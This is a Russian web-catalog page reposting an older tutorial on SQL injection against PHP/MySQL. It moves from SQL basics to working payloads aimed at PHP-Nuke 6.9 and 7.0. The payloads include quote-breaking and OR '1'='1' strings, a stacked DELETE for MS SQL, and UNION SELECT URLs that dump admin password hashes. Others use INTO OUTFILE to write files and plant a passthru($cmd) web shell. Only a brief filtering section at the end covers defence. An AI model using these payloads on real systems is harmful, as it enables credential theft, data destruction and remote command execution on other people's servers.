DirectoryWeb
    • Каталог
      • Скрипты
      • Боты
      • Программы
      • Android, iOS приложения
    • Арбитраж трафика
      • Тизерные сети
      • SMS рассылки
      • Telegram Ads
      • Анализ трафика
      • Видео трафик
      • Автоматизация
      • CPA-сети
      • Push-реклама
      • Popunder реклама
      • Нативная реклама
      • Ретаргетинг
      • Кейсы
      • Трекеры
      • Партнёрские программы
        • Товарные партнерки
        • Финансовые партнерки
        • Партнерки интернет-магазинов
        • Зарубежные партнерки
      • Реклама в Telegram
      • Сервисы
        • Прокси
        • Виртуальные карты
      • Инструменты
        • Мультиаккаунтинг
      • Обзоры
      • Мануалы
      • Антидетект-браузеры
    • Статьи
      • Маркетплейсы
      • Безопасность в сети
      • Заработок в интернете
      • Сайтостроение
      • Оптимизация сайтов
      • Обучение
      • Криптовалюты
      • Новости
      • Разное
      • Новости сайта
  • Контакты
  • Telegram
  • Вход / Регистрация

купить скрипт казино

Psb.Hosing - Хостинговое решение для быстрой и стабильной работы ваших проектов.
Купить резедентные прокси
Vibix - надеждый видео-балансир
    Заработок в интернете без вложений » Статьи » Сайтостроение » Общая теория Sql инъекций

Отзывы

Vibix Обновление плеера: стало ещё удобнее Представляем долгожданные улучшения в работе плеера: 1....

Общая теория Sql инъекций

Статьи / Сайтостроение

Для тех кому интересы основы Sql иньекций нашел замечательную статейку для понимания общих принципов, рекомендую к прочтению:

На различных сайтах посвященных безопасности часто пролетают сообщения о
нахождении уязвимостей внедрения SQL кода в различных скриптах, форумах, движках
и прочем. По-видимому данная проблема становится все более и более актуальна,
администраторы вовремя обновляют ПО на своих сайтах, авторы скриптов не пишут
скриптов с бажным инклудом, но когда встречается скрипт работающий с базой
данных то ошибки программирования, точнее сказать ошибки при запросах к базе,
так и лезут в глаза. В данной статье я хотел бы описать наиболе частые ошибки
приводящие к внедрению своего кода в запросы к базе, рассмотреть примеры
эксплоитинга данных баг для получения нужной нам инфы из базы… ну и посмотрим
что из этого всего получится =)
Примеры будут приводится на пхп т.к. имхо это наиболее удобный язык для работы с
БД, в качестве базы данных использоваться будет mysql версии 4.0.12, хотя
мельком думаю затронем и MS SQL. Для понимания атак данного класса вам
естественно необходимо знать структуру языка SQL. Ну чтож этим мы для начала и
займемся.
================================================
---/// Язык SQL
================================================
Для работы с базами данных используется язык SQL (Структурированный Язык
Запросов) Это язык, который дает возможность создавать реляционные базы данных
(и работать с ними), которые представляют собой наборы связанной информации,
сохраняемой в таблицах. Реляционная база данных это тело связанной информации,
сохраняемой в двухмерных таблицах. Это напоминает адресную или телефонную книгу.
Код:

+------------------+----------------------+-------------------------+
| name | password | email | <-- названия столбцев
+------------------+----------------------+-------------------------+
| admin | password | admin@localhost.com | <-- д
+------------------+----------------------+-------------------------+ <-- а
| lamer | qwerty | lamer@localhost.com | <-- н
+------------------+----------------------+-------------------------+ <-- н
| hacker | mamba | hacka@localhost.com | <-- ы
+------------------+----------------------+-------------------------+ <-- е

Есть несколько основных команд SQL которые необходимо знать для работы с БД.
Итак вот они:
Создание таблицы:
Код:

-----------------
CREATE TABLE имя таблицы (имя поля тип, имя поля тип, ...)
Этой командой в базе данных создается новая таблица с указанным именем и
полями(колонками) указанного типа.
Эта команда врятли пригодится нам в нашем нехорошем деле так что особо
останавливаться на ней не буду.
Удаление таблицы:
-----------------
DROP TABLE имя таблицы
Удаляет указанную таблицу, вне зависимости от того, пустая она или содержит
данные.
Вставка записи:
---------------
INSERT INTO имя таблицы (имя поля1, имя поля2, ...) VALUES ('значение1','значение2',...)
Добавляет в указаную таблицу поля и соответствующие им значения. Поля, которые
существуют в таблице, но не указаны в данной команде получают 'неопределенное
значение'. 'Неопределенное значение' - это, своего рода, внутренний флаг,
который указывает MySQL, что поле не имеет значения.
Примеры:
INSERT INTO users (name, password, email) VALUES ('root', 'pass', 'admin@localhost.com');
// Вставляет в таблицу "users" запись: root в поле name, pass в поле password
INSERT INTO admins (name, posts) VALUES ('admin', 2);
// Вставляет в таблицу “admins” запись: admin в поле name и 2 в поле posts
// Тут следует заметить что поле admin имеет текстовый формат, тогда как поле
// post имеет формат INT (числовой)
// Если бы оба поля были текстовыми то двойку также пришлось бы заключать в
// кавычки
Удаление записи:
----------------
DELETE FROM имя таблицы WHERE выражение
Удаляет из указанной таблицы все записи, которые удовлетворяют условию в
выражении после WHERE.
Примеры:
DELETE FROM users WHERE name='root';
DELETE FROM admins WHERE post=2;
Поиск записи:
-------------
SELECT * FROM имя таблицы WHERE выражение
Ищет в указанной таблице все записи, которые удовлетворяют условиям выражения.
Знак * означает выбор всех полей записи, если нужно выбрать всего-лишь несколько
полей, они перечисляются явным образом через запятую.
Примеры:
SELECT * FROM users;
// Выведет все записи из таблицы users
SELECT name, email FROM users;
// Выведет записи колонок name и email
SELECT name FROM admins WHERE post>2;
// Выведет записи колонки name из таблицы admins для которых соответствующее значение post>2
SELECT * FROM admins WHERE name='root';
Обновление записи:
------------------
UPDATE имя таблицы SET имя поля1='значение1', имя поля2='значение2',... WHERE выражение
В указанной таблице все записи которые удовлетворяют выражению, получают в
перечисленных полях соответствующие перечисленные значения.
Примеры:
UPDATE users SET name='bad-admin' WHERE password='qwerty';
// В таблице users у всех записей у которых стоит “qwerty” в колонке password, значение в колонке
// name сменится на “bad-admin”

================================================
---/// PHP и mySQL
================================================
Теперь посмотрим как работа с БД реализуется в пхп.
Для начала работы с базой нам необходимо установить с ней соединение:
mysql_connect($hostname,$username,$password)
И выбрать базу с которой будем работать:
mysql_select_db($dbname)
$hostname – сервер БД
$username – логин к базе $password – пароль к базе $dbname – название базы
После этого мы можем отдавать SQL запросы с помощью mysql_query($query) где
$query – наш запрос.

Например:
Код:

<?php
# определяем сервер, логин, пароль, название базы
$hostname = 'localhost';
$username = 'root';
$password = 'pass';
$dbname = 'forum';
# подключаемся к серверу
mysql_connect ($hostname,$username,$password);
# выбираем нужную базу
mysql_select_db($dbname);
# отдаем запрос к БД
$result = mysql_query("SELECT * FROM table_1");
...
?>

Вот в принципе основы которые нужно знать для работы с БД. Теперь переходим к
более интересному, а именно к способам внедрения своего кода.
================================================
---/// Основы SQL-injection
================================================
Как вы могли заметить тестовые данные передаются в sql-запросах заключенными в
кавычки ‘data' отсюда можно сделать интересное замечание. Что если к скрипте
данные для sql-запроса берутся из полученных от пользователя переменных и не
фильтруются… Тогда мы можем попробовать вставить в запрос эту самую кавычку "'"
Допустим есть скрипт выбирающий мыло пользователя из таблицы в соответствии с
его логином:
Код:

<?
... подключение к БД ...
... получение данных из запроса ...
$result = mysql_query("SELECT mail FROM users WHERE login='$login'");
...
?>

Если мы передаем в переменной $login нормальный текст например "lamer" то в SQL
будет выполнен запрос:
SELECT mail FROM users WHERE login='lamer'
И все сработает как надо…
А теперь попробуем вставить кавычку: $login=hacker'
И запрос будет такой:
SELECT mail FROM users WHERE login='hacker''
И как мы сможем увидеть данный запрос выдаст нам ошибку. Отлично =) Лишняя
кавычка сделала свое дело и мы смогли видоизменить запрос к базе данных.
Наипростейший пример. Допустим приведенный выше скрипт позволяет смотреть
пользователю его регистрационные данные. Теперь используя кавычку мы сможем
посмотреть инфу всех пользователей, вот примерно так:
$login=blah' OR login='admin
И sql-запрос изменится на такой:
SELECT mail FROM users WHERE login='blah' OR login='admin'
Т.е. вместо вывода мыла юзера, скрипт выдаст нам мыло админа данного скрипта.
Далее мы можем получить мыла всех пользователей:
$login=no_user' OR '1'='1
SQL запрос такой станет:
SELECT mail FROM users WHERE login='no_user' OR ‘1'='1'
Т.к. '1'='1' всегда то запрос вернет все записи из таблицы.
Использование кавычки применимо в случае передачи в запрос текстовых данных, с
числовыми данными все еще проще. Допустим скрипт выводит пароль пользователя в
соответствии с его порядковым номером:
Код:

<?
...
$result = mysql_query("SELECT password FROM users WHERE num=$num");
...
?>

При передаче нормального номера скрипт отдает запрос к БД и запрос возвращает
необходимые данные:
SELECT password FROM users WHERE num=7;
Тут мы можем изменить запрос даже не прибегая в кавычкам:
$num=1 OR 2
и запрос станет:
SELECT password FROM users WHERE num=1 OR 2;
Это основа данного типа атак. Также кроме кавычки есть еще символы которые
смогут нам пригодится.
Точка с запятой ";" служит для разделения sql-запросов к базе данных. К
сожалению не поддерживается в mysql =( так что далее в статье рассматриваться не
будет. В случае если мы имеем дело с MS SQL в которой данная возможность
поддерживается то с её помощью мы получаем возможность отдавать несколько
запросов в одной строке, например:
Рассмотренный выше скрипт:
Код:

<?
... подключение к БД ...
... получение данных из запроса ...
$result = mysql_query("SELECT mail FROM users WHERE login='$login'");
...
?>

Если работает с MS SQL то изменяем переменную вот таким образом:
$login=no_user'; delete FROM users WHERE login='admin
Запрос:
SELECT mail FROM users WHERE login='no_user'; delete FROM users WHERE login='admin';
Соответственно мы удалим запись у которой в поле login стоит значение "admin" =)
Также нам пригодятся "-" и "/*" это символы обозначающие в sql начало
комментария. Пригодится чтоб отсекать лишние данные в запросах.
Например:
$result = mysql_query("SELECT mail FROM users WHERE login='$login' AND post='123'");
Если мы передадим переменную $login=no_user' OR '1'='1 то запрос станет:
SELECT mail FROM users WHERE login='no_user' OR '1'='1' AND post='123';
Согласитесь не совсем то что нам надо =
В этом случае нам и пригодится комментирование…
$login=no_user' OR '1'='1';--
или
$login=no_user' OR '1'='1'/*
Заметьте что в данном случае мы сами закрываем кавычку в конце запроса т.к.
кавычка из запроса которая ранее закрывала переменную теперь будет
закоментирована.
Ну чтож мы теперь умеем выводить информацию из таблицы. Но вы заметили что мы
ограничены этой таблицей? Т.е. Мы не можем вывести данные из другой таблицы. Для
получения данных из других таблиц нам потребуется более детальное изучение
структуры запросов и еще одна команда.
================================================
---/// Использование команды UNION
================================================
Итак команда UNION используется для обьединения вывода двух или более запросов SELECT.
Особенности команды которые придется учитывать:
Когда два (или более) запроса подвергаются объединению, их столбцы вывода должны
быть совместимы для объединения. Это означает, что каждый запрос должен
указывать одинаковое количество столбцов и в том же порядке и каждый должен
иметь тип, совместимый с каждым.
Также данная возможность появилать только в mysql версии 4.0 т.е. на более
ранних версиях БД работать не будет.
Вид команды таков:
SELECT a1, a2, a3 FROM table1 UNION SELECT b1, b2, b3 FROM table2;
Где a1 и b1, a2 и b2, a3 и b3 должны быть одинакового типа.
Например:
SELECT text11, text12, int11 FROM t1 UNION SELECT text21, text22, int22 FROM t2;
Думаю наиболее удобно будет рассмотреть работу с данной командой на конкретном
примере. Помучить предлагаю PHP-Nuke версии 7.0 FINAL. Советую скачать и
поставить данный движек. Итак устанавливаем и настраиваем нюку. Запускаем mysql
с ведением логов и приступаем.
================================================
---/// SQL injection на примере PHP-Nuke
================================================
Итак разбираться будем с модулем News
http://127.0.0.1/nuke7/modules.php?name=News&new_topic=1
Вот такой запрос выводит первый топик на движке. Попробуем поставить кавычку к
значению new_topic, соответственно теперь запрос становится таким:
http://127.0.0.1/nuke7/modules.php?name=News&new_topic=1'
Отдаем в браузере запрос и смотрим логи mysql:
...
10 Query SELECT topictext FROM nuke_topics WHERE topicid='1''
^!!!
10 Query SELECT sid, catid, aid, title, time, hometext, bodytext, comments, counter, topic, informant, notes, acomm,
score, ratings FROM nuke_stories WHERE topic='1'' ORDER BY sid DESC limit 10
^!!!
...
Вот тут наша ковычка себя и проявила =)
Видите: WHERE topicid='1''
Рассмотрим первый запрос:
SELECT topictext FROM nuke_topics WHERE topicid='1''
Выборка topictext из таблицы nuke_topics где topicid=1'
Теперь посмотрим тип topictext:
+-------------------------+
| topictext | varchar(40) |
+-------------------------+
Отлично теперь попробуем использовать команду UNION:
Отдаем в браузере запрос:
modules.php?name=News&new_topic=999' UNION SELECT pwd from nuke_authors/*
Отлично =) Вместо названия раздела мы видим хеш пароля админа. Что же произошло.
Опять смотрим логи mysql:
14 Query SELECT topictext FROM nuke_topics WHERE topicid='999' UNION SELECT pwd from nuke_authors/*'
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
вот он наш запрос
Вот оно. Мы делаем выборку из nuke_topics где topicid='999' и данный запрос
естественно ничего не возвращает т.к. такого топика у нас нет и делаем выборку
pwd из таблицы nuke_authors и данный запрос возвращает хеш пароля первого
пользователя который и подставляется в название раздела. Заметьте что если мы
укажем существующий номер топика то результата мы не получим т.к. будет
подставлено название этого топика а не хеш. Поэтому мы и используем номер 999.
Вот первая уязвимость =)
Давайте рассмотрим второй запрос: ( запрос разбит на несколько строк для удобства )
SELECT sid, catid, aid, title, time, hometext, bodytext, comments, counter, topic, informant, notes, acomm, score, ratings
FROM nuke_stories
WHERE topic='1'' <-- Вот тут мы можем вставить свой sql-код
ORDER BY sid DESC limit 10
Посмотрим какие типы данных у нас в таблице nuke_stories:

+-----------+--------------+
| sid | int(11) |
+-----------+--------------+
| catid | int(11) |
+-----------+--------------+
| aid | varchar(30) |
+-----------+--------------+
| title | varchar(80) |
+-----------+--------------+
| time | datetime |
+-----------+--------------+
| hometext | text |
+-----------+--------------+
| bodytext | text |
+-----------+--------------+
| comments | int(11) |
+-----------+--------------+
| counter | mediumint(8) |
+-----------+--------------+
| topic | int(3) |
+-----------+--------------+
| informant | varchar(20) |
+-----------+--------------+
| notes | text |
+-----------+--------------+
| acomm | int(1) |
+-----------+--------------+
| score | int(10) |
+-----------+--------------+
| ratings | int(10) |
+-----------+--------------+

Теперь также просмотрим таблицу nuke_authors на типы записей и составим запрос с
UNION таким образом чтобы типы из таблицы nuke_stories совпадали с типами из
nuke_authors и запрос примет вид:
modules.php?name=News&new_topic=999' UNION SELECT counter, counter, pwd, pwd, counter, pwd, pwd, counter, counter, counter, pwd, pwd, counter, counter, counter FROM nuke_authors /*
Отдаем запрос в браузере и видим топик с содержанием хеша пароля =) Тут уже не
обязательно указывать несуществующий топик т.к. все работает и с топиком
существующим в базе.
Если посмотреть логи БД то можно увидеть что был отдан вот такой запрос к базе
данных: (запрос разбит на 4 блока для большего удобства)
SELECT sid, catid, aid, title, time, hometext, bodytext, comments, counter, topic, informant, notes, acomm, score, ratings
FROM nuke_stories
WHERE topic='1'
UNION
SELECT counter, counter, pwd, pwd, counter, pwd, pwd, counter, counter, counter, pwd, pwd, counter, counter, counter
FROM nuke_authors
/*
' ORDER BY sid DESC limit 10
Как вы можете видеть в обоих запросах количество и типы столбцев совпадают.
Запрос специально разбит на 4 блока:
1 блок - это первый запрос select выбирающий из таблицы nuke_stories
2 блок - команда обьединения запросов union
3 блок - второй запрос select который выбирает хеш пароля и счетчик из таблицы nuke_authors
4 блок - все что идет после "/*" будет рассматриваться как комментарий
================================================
---/// Вывод данных в файл
================================================
К слову сказать, в инете полно практически одинаковых статей про sql-injection и
все они рассказывают про атаки данного типа при использовании MS SQL в качестве
сервера базы данных. Конечно сервак от мелкомягких дает поистинне потрясающие
возможности для взлома всего сервера за счет возможностей разделения запросов в
строке и прочих фишек но это тема другой статьи а у нас на повестке mysql в
котором все не так просто, но это совсем не плохо, это хорошо т.к. с mysql
возится сложнее а значит интереснее =) А к чему я это сказал? Да просто в тех
статьях описывается взлом при авторизации и авторизация там происходит примерно
таким запросом:
SELECT * FROM users WHERE login='blabla' AND password='blabla';
Изврат! Не правда-ли? Абсолютно убогий способ работы с базой данных. Зачем
спрашивается выбирать все данные из таблицы? Бррр что-то меня вообще не туда
унесло = Мы лучше рассмотрим авторизацию в PHP-Nuke 6.9. в котором процесс
авторизации сделан более грамотно и красиво. Обратите внимание на версию нюки!
Дело в том что в версии 7.0 не удастся через форму внедрить код с помощью
кавычки т.к. там эта бага прикрыта. В версии 7.0 есть возможность внедрения кода
в этом модуле посредством cookie но мы пока что не будем трогать cookie т.к. на
эту тему статья будет чуть позднее а рассмотрим внедрение кода просто через
форму авторизации. Для этого и пришлось использовать более раннюю версию. Как
пример.
Запускаем [url]http://127.0.0.1/phpnuke69/admin.php[/url] и видим окошко для ввода логина и
пароля. Ну вы наверно уже догадались что мы будем делать? Конечно вписываем в
качестве логина admin' (не забудьте про кавычку) и 123 в кач-ве пароля.
Хммм... Не пускает =) Ну чтож всякое бывает =) Наверно потому что логин и пароль
в базе другие совсем =)))
Чтож опять лезем смотреть логи mysql:

1 Query SELECT pwd, admlanguage FROM nuke_authors WHERE aid='admin''
^ - вот она наша родная кавычка =)
Стоп! Вы уже побежали вставлять UNION и SELECT? Рано. Дело в том что в данном
модуле не происходит никакого вывода полученных данных из БД. Естественно раз
нет вывода то и вывести полученный хеш нам некуда. Что же делать. К счастью в
mysql есть замечательная опция сохранения выбранных из таблицы данных в файл.
Производится данный финт ушами следующим образом:

SELECT * FROM table INTO OUTFILE 'путь_к_файлу/файл';
Попробуем сохранить хеш пароля админа в файле. Форма ввода не позволяет ввести
длинный логин поэтому придется передавать данные через строку браузера:
[url]http://127.0.0.1/phpnuke69/admin.php?op=login&pwd=123&aid=admin'[/url] INTO OUTFILE 'pwd.txt
После запроса данной строки в БД исполняется:
9 Query SELECT pwd, admlanguage FROM nuke_authors WHERE aid='admin' INTO OUTFILE 'pwd.txt'
И хеш пароля пользователя "admin" оказывается записан в файл pwd.txt. Но вся
проблемма в том что файл создается не в корне www-сервера а в каталоге базы
данных. Для создания файла в каталоге доступном через web необходимо указывать
полный путь:
/phpnuke/admin.php?op=login&pwd=123&aid=admin' INTO OUTFILE '../../../../WWW/www1/phpnuke69/pwd.txt
И теперь уже:
http://127.0.0.1/phpnuke69/pwd.txt
Выдаст нам хеш админа.
Конечно необходимо учитывать права доступа и не факт что вы сможете записать
файл в нужное место но это сейчас не важно. Главное что мы смогли сформировать
нужный запрос и создать файл.
================================================
---/// Получение http-шелла
================================================
Конечно базы данных это хорошо, это интересно и познавательно, но хочется чего то
большего =) Их есть у меня =)
Как мы уже разобрались файлы мы создавать можем. А ведь в файл можно записать
любую инфу из базы данных, почему бы не воспользоваться этим и не создать себе
маленький такой http-шелл посредством создания php файла с незатейливым и
наверно всем знакомым содержанием: <? passthru($cmd) ?>
Итак воспользовавшись одним из описанных выше методов вам удалось все-таки
получить хеш пароля админа и вы благополучно залогинились как админ движка,
расшифровав пароль, либо вставив его в кукис (тема про куки будет более подробно
рассмотрена в следующей статье) Теперь вам необходимо каким-либо образом
вставить php-код в одно из значений в базе данных а потом вывести его в файл.
Вот способ которым воспользовался я:
Логинимся под админом. В меню администрирования входим в раздел Topics. Создаем
новый топик.
В поле Topic Name пишем passthru
в поле Topic Text пишем: <? passthru($cmd) ?>
Теперь вспомним уязвимость описанную выше в этой статье, а именно:
modules.php?name=News&new_topic=999' UNION SELECT pwd from nuke_authors/*
SELECT topictext FROM nuke_topics WHERE topicid='999' UNION SELECT pwd from nuke_authors/*'
Теперь нам не надо получать хеш пароля, а надо сохранить запись из столбца "topictext"
http://127.0.0.1/phpnuke/modules.php?name=News&new_topic=2' INTO OUTFILE 'shell.php' /*
где 2 - номер нового топика , shell.php - файл который будет создан
Не забудьте прописать путь к файлу.
После выполнения данного запроса будет создан файл shell.php содержащий нужный
нам пхп-код.
================================================
---/// Методы защиты
================================================
Если вы все-таки прочитали статью то наверно уже поняли что единственно верной
защитой является фильтрация всех данных принимаемых от пользователя. Наилучшим
решением будет разрешить использование лишь букв и цифр. В случае если
принимаемое значение должно быть цифрой, проверяейте его перед помещением в sql
запрос.
Не стоит надеятся на фильтрацию лишь одной кавычки т.к. во-первых атакующий может
использовать другие символы для если не внедрения кода то хотя бы для получения
дополнительной информации (например о пути к сайту) из сообщений о ошибках.
И во-вторых если скрипт отфильтровывает какой-либо символ, то его можно заменить
конструкцией +char(0xКОД_СИМВОЛА)+.
Также обращу внимание что фильтровать надо все данные пришедшие от пользователя
в запросах, в куках, в общем вообще все!
================================================
---/// Заключение
================================================
Ну вот и все. Я постарался рассмотреть наиболее информативные примеры атак типа
sql-injection. Надеюсь теперь вы сможете избежать ошибок при кодинге скриптов
работающих с базами данных. Удачи.
P.S. Вся информация в данной статье служит исключительно в образовательных целях.
Эта статья всего лишь попытка помочь авторам скриптов и указать на возможные
ошибки при работе с базами данных.

Общая теория Sql инъекций

10-02-2019, 18:34 Неизвестно
.
Скачать

Telegram

МАРКЕТПЛЕЙС ЦИФРОВЫХ ТОВАРОВ

Перейти в чат вебмастеров
  • DirectoryWeb
  • 10.02.2019
  • 1 5 730
  • 0
    • 60
    • 1
    • 2
    • 3
    • 4
    • 5
Использование вечных ссылок при продвижение сайта
Использование вечных ссылок при продвижение сайта
7-08-2015, 17:37, Оптимизация сайтов
Traff.is: Уникальный мультитул для арбитражников — все инструменты в одном месте для успешного старта и развития
Traff.is: Уникальный мультитул для арбитражников — все инструменты в одном месте для успешного старта и развития
19-08-2024, 12:00, Арбитраж трафика / Инструменты
Скрипт инвестиционного проекта Scrooge McDuck
Скрипт инвестиционного проекта Scrooge McDuck
26-11-2015, 00:47, HYIP, MLM, МММ
Скрипт системы онлайн обучения и экзаменов MenorahOES v1.1
Скрипт системы онлайн обучения и экзаменов MenorahOES v1.1
7-12-2017, 12:27, ---
TikTok Ads - как получить купон на 90 евро и 50% скидку на рекламу
TikTok Ads - как получить купон на 90 евро и 50% скидку на рекламу
14-05-2025, 22:04, Социальные сети / TikTok Ads
Партнерская программа Shakes.pro
Партнерская программа Shakes.pro
19-04-2025, 09:07, Арбитраж трафика / CPA-сети

Твой комментарий..

  • Скрипты
    • Telegram
    • Финансы
    • CS:GO
    • Бонусники
    • Браузерные игры
    • Интернет магазины
    • Автопостинг
    • Доски объявлений
    • Обменники
    • Казино
    • Каталоги
    • Конструкторы сайтов
    • Облачные майнинги
    • Платёжные системы
    • Рекламные сервисы
    • Социальные сети
      • TikTok Ads
    • Экономические игры
    • Чаты
    • Хостинги
    • HYIP, MLM, МММ
    • Фриланс биржи
    • E-mail рассылки
    • Разное
  • Арбитраж трафика
    • Тизерные сети
    • SMS рассылки
    • Telegram Ads
    • Анализ трафика
    • Видео трафик
    • Автоматизация
    • CPA-сети
    • Push-реклама
    • Popunder реклама
    • Нативная реклама
    • Ретаргетинг
    • Кейсы
    • Трекеры
    • Партнёрские программы
      • Товарные партнерки
      • Финансовые партнерки
      • Партнерки интернет-магазинов
      • Зарубежные партнерки
    • Реклама в Telegram
    • Сервисы
      • Прокси
      • Виртуальные карты
    • Инструменты
      • Мультиаккаунтинг
    • Обзоры
    • Мануалы
    • Антидетект-браузеры
  • HTML шаблоны
  • Боты
  • Программы
    • Парсинг
  • Android, iOS приложения
  • Статьи
    • Маркетплейсы
    • Безопасность в сети
    • Заработок в интернете
    • Сайтостроение
    • Оптимизация сайтов
    • Обучение
    • Криптовалюты
    • Новости
    • Разное
    • Новости сайта
Бустер аккаунтов от Telegram Expert
Подробнее
Бустер аккаунтов от Telegram Expert
Как заработать $13 187 за месяц на контентном трафике из Google: кейс по Восточной Европе
Подробнее
Как заработать $13 187 за месяц на контентном трафике из Google: кейс по Восточной Европе
Партнерская программа Mobidea
Подробнее
Партнерская программа Mobidea
RetailCRM: полезный сервис для бизнеса в Интернете
Подробнее
RetailCRM: полезный сервис для бизнеса в Интернете
QComment
Подробнее
QComment
Скрипт хайпа Stable Reinvest
Подробнее
Скрипт хайпа Stable Reinvest
Скрипт экономической игры AirMoney
Подробнее
Скрипт экономической игры AirMoney
Скрипт экономической игры YourFarm
Подробнее
Скрипт экономической игры YourFarm
Скрипт финансовой матрицы с переливами Cash-Like
Подробнее
Скрипт финансовой матрицы с переливами Cash-Like
Скрипт видио портала ClipShare Pro 4.1.4 Rus
Подробнее
Скрипт видио портала ClipShare Pro 4.1.4 Rus
Loading...

Внимание! Данный материал предоставлен сайтом DirectoryWeb.ru исключительно в ознакомительных целях. Администрация не несет ответственности за его содержимое

  • Топ просмотров
  • Высший рейтинг
  • Самый топ
Топ платежных систем для арбитража трафика

Топ платежных систем для арбитража трафика

  • ddspprtn
  • 27.05.2025
  • 1 172
  • 0
    • 40
    • 1
    • 2
    • 3
    • 4
    • 5
  • Подробнее..
PSB PROXY - обзор и отзывы

PSB PROXY - обзор и отзывы

  • redactor
  • 28.05.2025
  • 1 77
  • 0
    • 60
    • 1
    • 2
    • 3
    • 4
    • 5
  • Подробнее..
PSB PROXY - обзор и отзывы

PSB PROXY - обзор и отзывы

  • redactor
  • 28.05.2025
  • 1 77
  • 0
    • 60
    • 1
    • 2
    • 3
    • 4
    • 5
  • Подробнее..
Топ платежных систем для арбитража трафика

Топ платежных систем для арбитража трафика

  • ddspprtn
  • 27.05.2025
  • 1 172
  • 0
    • 40
    • 1
    • 2
    • 3
    • 4
    • 5
  • Подробнее..
Скрипт сайта рулетки CSGOSHIK

Скрипт сайта рулетки CSGOSHIK

  • DirectoryWeb
  • 01.10.2018
  • 1 3 871
  • 0
    • 60
    • 1
    • 2
    • 3
    • 4
    • 5
  • Подробнее..
Скрипт онлайн казино Фараон

Скрипт онлайн казино Фараон

  • DirectoryWeb
  • 30.09.2018
  • 1 7 901
  • 0
    • 60
    • 1
    • 2
    • 3
    • 4
    • 5
  • Подробнее..
Скрипт онлайн казино FlashCasino 1.2

Скрипт онлайн казино FlashCasino 1.2

  • DirectoryWeb
  • 26.10.2018
  • 1 3 417
  • 0
    • 60
    • 1
    • 2
    • 3
    • 4
    • 5
  • Подробнее..
Cкрипт онлайн лотереи Lottery for life

Cкрипт онлайн лотереи Lottery for life

  • DirectoryWeb
  • 17.10.2018
  • 1 4 222
  • 0
    • 60
    • 1
    • 2
    • 3
    • 4
    • 5
  • Подробнее..
Скрипт онлайн казино Вулкан NEW

Скрипт онлайн казино Вулкан NEW

  • DirectoryWeb
  • 28.10.2018
  • 1 12 330
  • 0
    • 60
    • 1
    • 2
    • 3
    • 4
    • 5
  • Подробнее..
Скрипт Bitcoin игр онлайн Quizda

Скрипт Bitcoin игр онлайн Quizda

  • DirectoryWeb
  • 01.08.2018
  • 1 4 174
  • 0
    • 60
    • 1
    • 2
    • 3
    • 4
    • 5
  • Подробнее..
Скрипт игры моментальной лотереи - рулетки Best-Loto

Скрипт игры моментальной лотереи - рулетки Best-Loto

  • DirectoryWeb
  • 23.01.2018
  • 1 8 425
  • 0
    • 60
    • 1
    • 2
    • 3
    • 4
    • 5
  • Подробнее..
Скрипт моментальной лотереи Fast Loto

Скрипт моментальной лотереи Fast Loto

  • DirectoryWeb
  • 05.10.2017
  • 1 7 897
  • 0
    • 60
    • 1
    • 2
    • 3
    • 4
    • 5
  • Подробнее..
Скрипт онлайн казино Brilliant-Club

Скрипт онлайн казино Brilliant-Club

  • DirectoryWeb
  • 02.07.2017
  • 1 10 169
  • 0
    • 60
    • 1
    • 2
    • 3
    • 4
    • 5
  • Подробнее..
Информация
  • О проекте
  • Правила
  • Статистика
  • Облако тегов
  • Контакты
  • Карта сайта
Каталог
  • Скрипты
  • Боты
  • Программы
  • Android, iOS приложения
  • Статьи
Арбитраж трафика
  • Кейсы
  • Партнёрские программы
  • Сервисы
  • Инструменты
  • Обзоры
Полезные ссылки
  • Партнерские программы и сервисы
  • Скрипты, моды и шаблоны
Заказ
Быстрый вход

Используйте социальные сети для быстрой регистрации и авторизации.

ВКонтакте
Создать аккаунт / Регистрация
Авторизация

Я забыл свой пароль